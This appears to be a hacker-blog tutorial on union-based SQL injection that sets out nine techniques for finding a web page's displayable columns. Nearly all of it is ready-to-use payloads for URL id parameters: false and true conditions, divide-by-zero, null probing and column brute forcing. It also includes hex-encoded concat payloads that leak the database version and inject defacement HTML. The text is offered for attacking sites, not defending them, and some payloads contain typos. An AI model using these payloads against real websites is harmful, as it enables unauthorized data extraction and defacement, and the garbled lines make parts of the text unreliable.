How to Find Vuln Column in SQL InjectiOn
HeYy peep Injectors Today we will learn How to find vul column in Sql Injection
NOTE: THIS IS NOT MY OWN CREDIT GOES TO ALL 1337 INJECTORS
1st Technique:-
use ⇨ id = -1 union select 1,2,3,4,5--
use ⇨ id = 1111/9999/null/bybysql union select 1,2,3,4,5--
use ⇨ id = .1/1.2/12.4 union select 1,2,3,4,5--
2nd Technique:-
False Parameter
Here False Parameter means put something that make a wrong response into our SQL PARAMETER like
(a) 1=2, 1=0
use ⇨ id=1 or 1=2 union select 1,2,3,4,5--
use ⇨ id=1 or 1=0 union select 1,2,3,4,5--
(b) Also can we use having, like, <>
use ⇨ id=1 having/HAVING 1=2 union select 1,2,3,4,5--
use ⇨ id=1 1 like/LIKE 2 union select 1,2,3,4,5--
use ⇨ id=1 1 <> 1 union select 1,2,3,4,5--
use ⇨ id=1 (having/and) 1 like 2 union select 1,2,3,4,5--
use ⇨ id=1 (having/and) 1 <> 1 union select 1,2,3,4,5-- /* use either having or and
(c) Also u can use and false/AND FALSE statement
use ⇨ id=1 and false union select 1,2,3,4,5--
3rd Technique :- Divide by 0 means -> /0 and +div+0
use ⇨ id =12/0 union select 1,2,3,4,5--
use ⇨ id = 12+div+0+ union select 1,2,3,4,5--
4th Technique :- Look closely, or scratch the HTML source code
The number can potentially be display anywhere, when it's kind of rough, just change the query to make the whole thing more visible to something like
http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--
Above we use 1111 ,2222 instead of 1,2 respectively
After writing dat code open source code then search the 'Column Number' like 1111,2222,3333,4444,5555 by using (CTRL+F :- For finding something in source code) Then check where is dat number appearing in source code
Sometimes the number display on the page title.
When U get the vulnerable columns then u want to display the version,user,database or some html parts to visible on page So 4 dat Follow These Steps :-
i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
Where
223e => ">
3c696d67207372633d22 => <img src="
*Remeber we use 0x so dat above hex code works
ii.) 4 print our name
id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
Where
0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \"><font color = red size=4>MALIKUBI</font><!--
5th Technique :-
U tried all above technique but stille can't get vulnerable column then u can also use this 5th technique.... Wats new in this technique See :-
u can use union select 1,2,3,4,5-- as union (select 1,2,3,4,5)--
use :- id=-2 union (select 1,2,3,4,5)--
/* If u see vul col like 3 then
use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--
6th Technique :- True Parameter
use ⇨ id=1 +where+1=1 union select 1,2,3,4,5--
use ⇨ id=1 +and+50=50 union select 1,2,3,4,5--
use ⇨ id=1 =75=75 union select 1,2,3,4,5--
7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
Frnds when u can't find number of columns then u also can use this techniue. By this technique not only u find number of columns u also get vulnerable columns.
Follow the following steps
1st do ⇨ union select 1--
2nd do⇨ union select 1,2--
3rd do ⇨ union select 1,2,3--
4th do ⇨ union slect 1,2,3,4--
5th do ⇨ union select 1,2,3,4,5--
Do these steps untill we can't get vulnerabls.
Do above steps untill u cant get vulnerable columns :)
8th Techniues :- Guessing which number is vulnerable
suppose we have union select 1,2,3,4,5,6,7--
Then replace numbers with any words u want like :-
union select 'hello1','hello2','hello3','hello4','hello5' [Then convert 'hello1' in hex format] OR
union select version(),version(),version(),version(),version() [No need to convert] OR
union select :1,:2,:3,:4,:5,:6 [Then convert :1 in hex format. I think it is very easy to use and not confusing ]
9th Techniques:- Using null
Friends we can also use null to get vulnerable columns.
See this :-
union select 1,2,3,4,5,6,7--
union select null,2,3,4,5,6,7-- Error [But if 1 is vulnerable den no error]
union selecct 1,null,2,3,4,5,6,7-- Error "
union select 1,2,null,3,4,5,6,7-- Error "
union select 1,2,3,null,4,5,6,7-- No Error [Suppose if 4 is vulnerable den no error]
union select 1,2,3,4,null,5,6,7--
union select 1,2,3,4,5,null,6,7--
union select 1,2,3,4,5,null,7--
union select 1,2,3,4,5,6,null --
Thats It there is lot more than this but Next time coming with that more Stuff
HOPE YOU LIKE THIS SHARING IS CARING SO KEEP LEARNING ENJOY
Post A Comment
No comments :